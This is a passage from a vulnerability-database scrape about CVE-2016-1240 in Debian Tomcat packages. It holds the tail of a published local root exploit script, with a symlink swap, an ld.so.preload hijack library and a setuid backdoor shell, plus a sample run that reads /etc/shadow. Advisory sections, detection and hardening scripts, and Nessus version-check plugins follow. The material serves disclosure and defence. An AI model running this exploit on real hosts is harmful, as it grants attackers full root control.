if [ \"$2\" = \"-deferred\" ]; then

\tmode=\"deferred\"

else

\tmode=\"active\"

fi



# Priv check

echo -e \"\

[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \

`id`\"

id | grep -q tomcat

if [ $? -ne 0 ]; then

\techo -e \"\

[!] You need to execute the exploit as tomcat user! Exiting.\

\"

\texit 3

fi



# Set target paths

TOMCATLOG=\"$1\"

if [ ! -f $TOMCATLOG ]; then

\techo -e \"\

[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\

\"

\texit 3

fi

echo -e \"\

[+] Target Tomcat log file set to $TOMCATLOG\"



# [ Deferred exploitation ]



# Symlink the log file to /etc/default/locale file which gets executed daily on default

# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.

# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been

# restarted and file owner gets changed.

if [ \"$mode\" = \"deferred\" ]; then

\trm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG

\tif [ $? -ne 0 ]; then

\t\techo -e \"\

[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"

\t\tcleanexit 3

\tfi

\techo -e \"\

[+] Symlink created at: \

`ls -l $TOMCATLOG`\"

\techo -e \"\

[+] The current owner of the file is: \

`ls -l /etc/default/locale`\"

\techo -ne \"\

[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\"

\techo -ne \"\

you'll be able to add arbitrary commands to the file which will get executed with root privileges\"

\techo -ne \"\

at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\

\

\"

\texit 0

fi



# [ Active exploitation ]



trap ctrl_c INT

# Compile privesc preload library

echo -e \"\

[+] Compiling the privesc shared library ($PRIVESCSRC)\"

cat <<_solibeof_>$PRIVESCSRC

#define _GNU_SOURCE

#include <stdio.h>

#include <sys/stat.h>

#include <unistd.h>

#include <dlfcn.h>

uid_t geteuid(void) {

\tstatic uid_t (*old_geteuid)();

\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");

\tif ( old_geteuid() == 0 ) {

\t\tchown(\"$BACKDOORPATH\", 0, 0);

\t\tchmod(\"$BACKDOORPATH\", 04777);

\t\tunlink(\"/etc/ld.so.preload\");

\t}

\treturn old_geteuid();

}

_solibeof_

gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl

if [ $? -ne 0 ]; then

\techo -e \"\

[!] Failed to compile the privesc lib $PRIVESCSRC.\"

\tcleanexit 2;

fi



# Prepare backdoor shell

cp $BACKDOORSH $BACKDOORPATH

echo -e \"\

[+] Backdoor/low-priv shell installed at: \

`ls -l $BACKDOORPATH`\"



# Safety check

if [ -f /etc/ld.so.preload ]; then

\techo -e \"\

[!] /etc/ld.so.preload already exists. Exiting for safety.\"

\tcleanexit 2

fi



# Symlink the log file to ld.so.preload

rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG

if [ $? -ne 0 ]; then

\techo -e \"\

[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"

\tcleanexit 3

fi

echo -e \"\

[+] Symlink created at: \

`ls -l $TOMCATLOG`\"



# Wait for Tomcat to re-open the logs

echo -ne \"\

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"

echo -e \"\

You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"

while :; do

\tsleep 0.1

\tif [ -f /etc/ld.so.preload ]; then

\t\techo $PRIVESCLIB > /etc/ld.so.preload

\t\tbreak;

\tfi

done



# /etc/ld.so.preload file should be owned by tomcat user at this point

# Inject the privesc.so shared library to escalate privileges

echo $PRIVESCLIB > /etc/ld.so.preload

echo -e \"\

[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \

`ls -l /etc/ld.so.preload`\"

echo -e \"\

[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"

echo -e \"\

[+] The /etc/ld.so.preload file now contains: \

`cat /etc/ld.so.preload`\"



# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)

echo -e \"\

[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"

sudo --help 2>/dev/null >/dev/null



# Check for the rootshell

ls -l $BACKDOORPATH | grep rws | grep -q root

if [ $? -eq 0 ]; then

\techo -e \"\

[+] Rootshell got assigned root SUID perms at: \

`ls -l $BACKDOORPATH`\"

\techo -e \"\

\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"

else

\techo -e \"\

[!] Failed to get root\"

\tcleanexit 2

fi



# Execute the rootshell

echo -e \"\

[+] Executing the rootshell $BACKDOORPATH now! \

\"

$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"

$BACKDOORPATH -p



# Job done.

cleanexit 0



--------------[ EOF ]--------------------







Example exploit run:

~~~~~~~~~~~~~~



tomcat7@ubuntu:/tmp$ id

uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)



tomcat7@ubuntu:/tmp$ lsb_release -a

No LSB modules are available.

Distributor ID:\tUbuntu

Description:\tUbuntu 16.04 LTS

Release:\t16.04

Codename:\txenial



tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat

ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries

ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine

ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files



tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out



Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit

CVE-2016-1240



Discovered and coded by:



Dawid Golunski

http://legalhackers.com



[+] Starting the exploit in [active] mode with the following privileges:

uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)



[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out



[+] Compiling the privesc shared library (/tmp/privesclib.c)



[+] Backdoor/low-priv shell installed at:

-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh



[+] Symlink created at:

lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload



[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...

You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)



[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:

-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload



[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload



[+] The /etc/ld.so.preload file now contains:

/tmp/privesclib.so



[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!



[+] Rootshell got assigned root SUID perms at:

-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh



Please tell me you're seeing this too ;)



[+] Executing the rootshell /tmp/tomcatrootsh now!



tomcatrootsh-4.3# id

uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)

tomcatrootsh-4.3# whoami

root

tomcatrootsh-4.3# head -n3 /etc/shadow

root:$6$oaf[cut]:16912:0:99999:7:::

daemon:*:16912:0:99999:7:::

bin:*:16912:0:99999:7:::

tomcatrootsh-4.3# exit

exit



[+] Cleaning up...



[+] Job done. Exiting with code 0







VI. BUSINESS IMPACT

-------------------------



Local attackers who have gained access to the tomcat user account (for example

remotely via a vulnerable web application, or locally via weak webroot permissions)

could escalate their privileges to root and fully compromise the affected system.
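The exploit above leaves three artefacts a responder can look for: catalina.out turned into a symlink, a tomcat-owned /etc/ld.so.preload (or /etc/default/locale in deferred mode) and a root-owned setuid shell under /tmp. The following audit script is an added example, not part of the original advisory or of the Debian packages; the path layout (/var/log/tomcatN/catalina.out, /etc/ld.so.preload, /tmp) is taken from the exploit and its example run, and every check takes its path as a parameter so it can also be pointed at a mounted disk image.

```shell
#!/bin/sh
# Audit helpers for CVE-2016-1240 indicators (example code added here, not
# from the advisory). Each check prints a FINDING line and returns 1 when
# the indicator is present, 0 when it is absent.

# 1. catalina.out replaced by a symlink: the first step of both exploit modes.
check_log_is_symlink() {
    log="$1"
    if [ -L "$log" ]; then
        echo "FINDING: $log is a symlink -> $(readlink "$log")"
        return 1
    fi
    return 0
}

# 2. A preload file that is not root-owned, or that names a library outside
#    the system library directories (the active mode writes /tmp/privesclib.so).
check_preload() {
    preload="$1"
    [ -e "$preload" ] || return 0            # absent is the normal state
    rc=0
    if [ -n "$(find "$preload" -maxdepth 0 ! -user root 2>/dev/null)" ]; then
        echo "FINDING: $preload is not owned by root"
        rc=1
    fi
    while IFS= read -r lib || [ -n "$lib" ]; do
        case "$lib" in
            ''|'#'*) ;;
            /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*) ;;
            *) echo "FINDING: $preload loads $lib from an unusual location"; rc=1 ;;
        esac
    done < "$preload"
    return "$rc"
}

# 3. A file that should be root-owned but is not (deferred mode leaves
#    /etc/default/locale owned by the tomcat user after the restart).
check_root_owned() {
    f="$1"
    [ -e "$f" ] || return 0
    if [ -n "$(find "$f" -maxdepth 0 ! -user root 2>/dev/null)" ]; then
        echo "FINDING: $f is not owned by root"
        return 1
    fi
    return 0
}

# 4. Root-owned setuid regular files below a world-writable directory
#    (the dropped root shell, /tmp/tomcatrootsh in the example run).
check_suid_in() {
    dir="$1"
    hits=$(find "$dir" -xdev -type f -user root -perm -4000 2>/dev/null || true)
    if [ -n "$hits" ]; then
        printf 'FINDING: root-owned setuid file(s) under %s:\n%s\n' "$dir" "$hits"
        return 1
    fi
    return 0
}

# Run every check against a live Debian/Ubuntu host; $1 is the Tomcat major
# version (6, 7 or 8). The return value is the number of indicators found.
audit_tomcat_host() {
    n="${1:-7}"
    found=0
    check_log_is_symlink "/var/log/tomcat$n/catalina.out" || found=$((found + 1))
    check_preload /etc/ld.so.preload                       || found=$((found + 1))
    check_root_owned /etc/default/locale                   || found=$((found + 1))
    check_suid_in /tmp                                     || found=$((found + 1))
    return "$found"
}

# Usage: sh audit-tomcat.sh 7
if [ $# -gt 0 ]; then audit_tomcat_host "$1"; fi
```

A non-root /etc/ld.so.preload is the loudest of the four signals: the file normally does not exist at all on Debian, so its mere presence, whatever its owner, deserves a look before any setuid binary is run on the host.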





VII. SYSTEMS AFFECTED

-------------------------



The following Debian package versions are affected:



Tomcat 8 <= 8.0.36-2

Tomcat 7 <= 7.0.70-2

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1



A more detailed list of affected packages can be found at:



Debian:

https://security-tracker.debian.org/tracker/CVE-2016-1240



Ubuntu:

http://www.ubuntu.com/usn/usn-3081-1/



Other systems that use Tomcat packages provided by Debian may also be affected.





VIII. SOLUTION

-------------------------



The Debian Security Team was contacted and has fixed the affected packages.

Update to the latest tomcat packages provided by your distribution.
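The root cause is an init script that, running as root, creates catalina.out and chowns it to the tomcat user while following symlinks. The fragment below is an added example that puts that unsafe pattern next to a hardened replacement; the exact lines of the Debian init script and of the vendor fix are not reproduced, and the touch-plus-chown form of the unsafe variant is an assumption based on the advisory's description of the bug.

```shell
#!/bin/sh
# Unsafe log-file preparation beside a hardened replacement (example code
# added here; the real Debian init script and its fix are not copied).

# Unsafe: touch and chown both dereference symlinks, so once the tomcat user
# has replaced $1 with a symlink, root re-owns whatever it points at.
unsafe_prepare_log() {
    touch "$1" && chown "$2" "$1"
}

# Hardened: never dereference. Refuse anything that already exists and is
# not a plain file, create the file only when absent, and chown with -h so
# that a symlink slipped in between the test and the chown has its own
# ownership changed rather than its target's. The window in which a racing
# symlink could still be truncated by the redirection is narrowed, not
# closed; a stronger design keeps the log directory writable only by root,
# so the tomcat user can append to catalina.out but cannot unlink and
# replace it.
safe_prepare_log() {
    log="$1"
    owner="$2"
    if [ -L "$log" ]; then
        echo "refusing: $log is a symlink" >&2
        return 1
    fi
    if [ -e "$log" ] && [ ! -f "$log" ]; then
        echo "refusing: $log exists and is not a regular file" >&2
        return 1
    fi
    if [ ! -e "$log" ]; then
        : > "$log" || return 1
    fi
    chown -h "$owner" "$log"
}

# Usage (as the service user or root):
#   safe_prepare_log /var/log/tomcat7/catalina.out tomcat7
```

Run as root, unsafe_prepare_log on a symlinked catalina.out silently hands the link's target to the tomcat user, which is exactly the step the exploit waits for; safe_prepare_log fails loudly instead and leaves the link untouched.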



IX. REFERENCES

-------------------------



http://legalhackers.com



http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html



The exploit's sourcecode

http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh



CVE-2016-1240

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240



Ubuntu Security Notice USN-3081-1:

http://www.ubuntu.com/usn/usn-3081-1/



Debian Security Advisory DSA-3669-1 (tomcat7):

https://lists.debian.org/debian-security-announce/2016/msg00249.html

https://www.debian.org/security/2016/dsa-3669



Debian Security Advisory DSA-3670-1 (tomcat8):

https://www.debian.org/security/2016/dsa-3670



https://security-tracker.debian.org/tracker/CVE-2016-1240





X. CREDITS

-------------------------



The vulnerability has been discovered by Dawid Golunski

dawid (at) legalhackers (dot) com

http://legalhackers.com



XI. REVISION HISTORY

-------------------------



30.09.2016 - Advisory released



XII. LEGAL NOTICES

-------------------------



The information contained within this advisory is supplied \"as-is\" with

no warranties or guarantees of fitness of use or otherwise. I accept no

responsibility for any damage caused by the use or misuse of this information.", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-09-04T01:24:17", "description": "Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-16T00:00:00", "title": "Debian DSA-3669-1 : tomcat7 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:tomcat7"], "id": "DEBIAN_DSA-3669.NASL", "href": "https://www.tenable.com/plugins/nessus/93548", "sourceData": "#

# (C) Tenable Network Security, Inc.

#

# The descriptive text and package checks in this plugin were

# extracted from Debian Security Advisory DSA-3669. The text

# itself is copyright (C) Software in the Public Interest, Inc.

#



include(\"compat.inc\");



if (description)

{

script_id(93548);

script_version(\"2.7\");

script_cvs_date(\"Date: 2018/11/10 11:49:38\");



script_cve_id(\"CVE-2016-1240\");

script_xref(name:\"DSA\", value:\"3669\");



script_name(english:\"Debian DSA-3669-1 : tomcat7 - security update\");

script_summary(english:\"Checks dpkg output for the updated package\");



script_set_attribute(

attribute:\"synopsis\",

value:\"The remote Debian host is missing a security-related update.\"

);

script_set_attribute(

attribute:\"description\",

value:

\"Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://packages.debian.org/source/jessie/tomcat7\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://www.debian.org/security/2016/dsa-3669\"

);

script_set_attribute(

attribute:\"solution\",

value:

\"Upgrade the tomcat7 packages.



For the stable distribution (jessie), this problem has been fixed in

version 7.0.56-3+deb8u4.\"

);

script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");

script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");

script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");

script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");

script_set_attribute(attribute:\"exploit_available\", value:\"true\");



script_set_attribute(attribute:\"plugin_type\", value:\"local\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");

script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");



script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");

script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");

script_end_attributes();



script_category(ACT_GATHER_INFO);

script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");

script_family(english:\"Debian Local Security Checks\");



script_dependencies(\"ssh_get_info.nasl\");

script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");



exit(0);

}





include(\"audit.inc\");

include(\"debian_package.inc\");





if (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

if (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");

if (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);





flag = 0;

if (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"libtomcat7-java\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7-admin\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7-common\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7-docs\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7-examples\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7-user\", reference:\"7.0.56-3+deb8u4\")) flag++;



if (flag)

{

if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());

else security_hole(0);

exit(0);

}

else audit(AUDIT_HOST_NOT, \"affected\");

", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T01:24:17", "description": "Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-16T00:00:00", "title": "Debian DSA-3670-1 : tomcat8 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:tomcat8"], "id": "DEBIAN_DSA-3670.NASL", "href": "https://www.tenable.com/plugins/nessus/93549", "sourceData": "#

# (C) Tenable Network Security, Inc.

#

# The descriptive text and package checks in this plugin were

# extracted from Debian Security Advisory DSA-3670. The text

# itself is copyright (C) Software in the Public Interest, Inc.

#



include(\"compat.inc\");



if (description)

{

script_id(93549);

script_version(\"2.7\");

script_cvs_date(\"Date: 2018/11/10 11:49:38\");



script_cve_id(\"CVE-2016-1240\");

script_xref(name:\"DSA\", value:\"3670\");



script_name(english:\"Debian DSA-3670-1 : tomcat8 - security update\");

script_summary(english:\"Checks dpkg output for the updated package\");



script_set_attribute(

attribute:\"synopsis\",

value:\"The remote Debian host is missing a security-related update.\"

);

script_set_attribute(

attribute:\"description\",

value:

\"Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://packages.debian.org/source/jessie/tomcat8\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://www.debian.org/security/2016/dsa-3670\"

);

script_set_attribute(

attribute:\"solution\",

value:

\"Upgrade the tomcat8 packages.



For the stable distribution (jessie), this problem has been fixed in

version 8.0.14-1+deb8u3.\"

);

script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");

script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");

script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");

script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");

script_set_attribute(attribute:\"exploit_available\", value:\"true\");



script_set_attribute(attribute:\"plugin_type\", value:\"local\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");

script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");



script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");

script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");

script_end_attributes();



script_category(ACT_GATHER_INFO);

script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");

script_family(english:\"Debian Local Security Checks\");



script_dependencies(\"ssh_get_info.nasl\");

script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");



exit(0);

}





include(\"audit.inc\");

include(\"debian_package.inc\");





if (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

if (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");

if (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);





flag = 0;

if (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"libtomcat8-java\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8-admin\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8-common\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8-docs\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8-examples\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8-user\", reference:\"8.0.14-1+deb8u3\")) flag++;



if (flag)

{

if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());

else security_hole(0);

exit(0);

}

else audit(AUDIT_HOST_NOT, \"affected\");

", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T13:32:12", "description": "Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 7 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat7 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-

Escalation-Exploit.txt



In addition this security update also fixes Debian bug #821391. File

ownership in /etc/tomcat7 will no longer be unconditionally overridden

on upgrade. As another precaution the file permissions of Debian

specific configuration files in /etc/tomcat7 were changed to 640 to

disallow world readable access.



For Debian 7 'Wheezy', these problems have been fixed in version

7.0.28-4+deb7u6.



We recommend that you upgrade your tomcat7 packages.



NOTE: Tenable Network Security has extracted the preceding description

block directly from the DLA security advisory. Tenable has attempted

to automatically clean and format it as much as possible without

introducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-16T00:00:00", "title": "Debian DLA-623-1 : tomcat7 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2016-09-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:tomcat7-user", "p-cpe:/a:debian:debian_linux:tomcat7-docs", "p-cpe:/a:debian:debian_linux:tomcat7-admin", "p-cpe:/a:debian:debian_linux:tomcat7-examples", "p-cpe:/a:debian:debian_linux:libservlet3.0-java", "p-cpe:/a:debian:debian_linux:tomcat7-common", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:libtomcat7-java", "p-cpe:/a:debian:debian_linux:tomcat7", "p-cpe:/a:debian:debian_linux:libservlet3.0-java-doc"], "id": "DEBIAN_DLA-623.NASL", "href": "https://www.tenable.com/plugins/nessus/93545", "sourceData": "#%NASL_MIN_LEVEL 80502

#

# (C) Tenable Network Security, Inc.

#

# The descriptive text and package checks in this plugin were

# extracted from Debian Security Advisory DLA-623-1. The text

# itself is copyright (C) Software in the Public Interest, Inc.

#



include(\"compat.inc\");



if (description)

{

script_id(93545);

script_version(\"2.7\");

script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");



script_cve_id(\"CVE-2016-1240\");



script_name(english:\"Debian DLA-623-1 : tomcat7 security update\");

script_summary(english:\"Checks dpkg output for the updated packages.\");



script_set_attribute(

attribute:\"synopsis\",

value:\"The remote Debian host is missing a security update.\"

);

script_set_attribute(

attribute:\"description\",

value:

\"Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 7 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat7 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-

Escalation-Exploit.txt



In addition this security update also fixes Debian bug #821391. File

ownership in /etc/tomcat7 will no longer be unconditionally overridden

on upgrade. As another precaution the file permissions of Debian

specific configuration files in /etc/tomcat7 were changed to 640 to

disallow world readable access.



For Debian 7 'Wheezy', these problems have been fixed in version

7.0.28-4+deb7u6.



We recommend that you upgrade your tomcat7 packages.



NOTE: Tenable Network Security has extracted the preceding description

block directly from the DLA security advisory. Tenable has attempted

to automatically clean and format it as much as possible without

introducing additional issues.\"

);

# http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Escalation-Exploit.txt

script_set_attribute(

attribute:\"see_also\",

value:\"http://www.nessus.org/u?f1cb3176\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://lists.debian.org/debian-lts-announce/2016/09/msg00016.html\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://packages.debian.org/source/wheezy/tomcat7\"

);

script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");

script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");

script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");

script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");

script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");

script_set_attribute(attribute:\"exploit_available\", value:\"true\");



script_set_attribute(attribute:\"plugin_type\", value:\"local\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java-doc\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat7-java\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-admin\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-common\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-docs\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-examples\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-user\");

script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");



script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");

script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");

script_end_attributes();



script_category(ACT_GATHER_INFO);

script_copyright(english:\"This script is Copyright (C) 2016-2020 Tenable Network Security, Inc.\");

script_family(english:\"Debian Local Security Checks\");



script_dependencies(\"ssh_get_info.nasl\");

script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");



exit(0);

}





include(\"audit.inc\");

include(\"debian_package.inc\");





if (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

if (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");

if (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);





flag = 0;

if (deb_check(release:\"7.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.28-4+deb7u6\")) flag++;

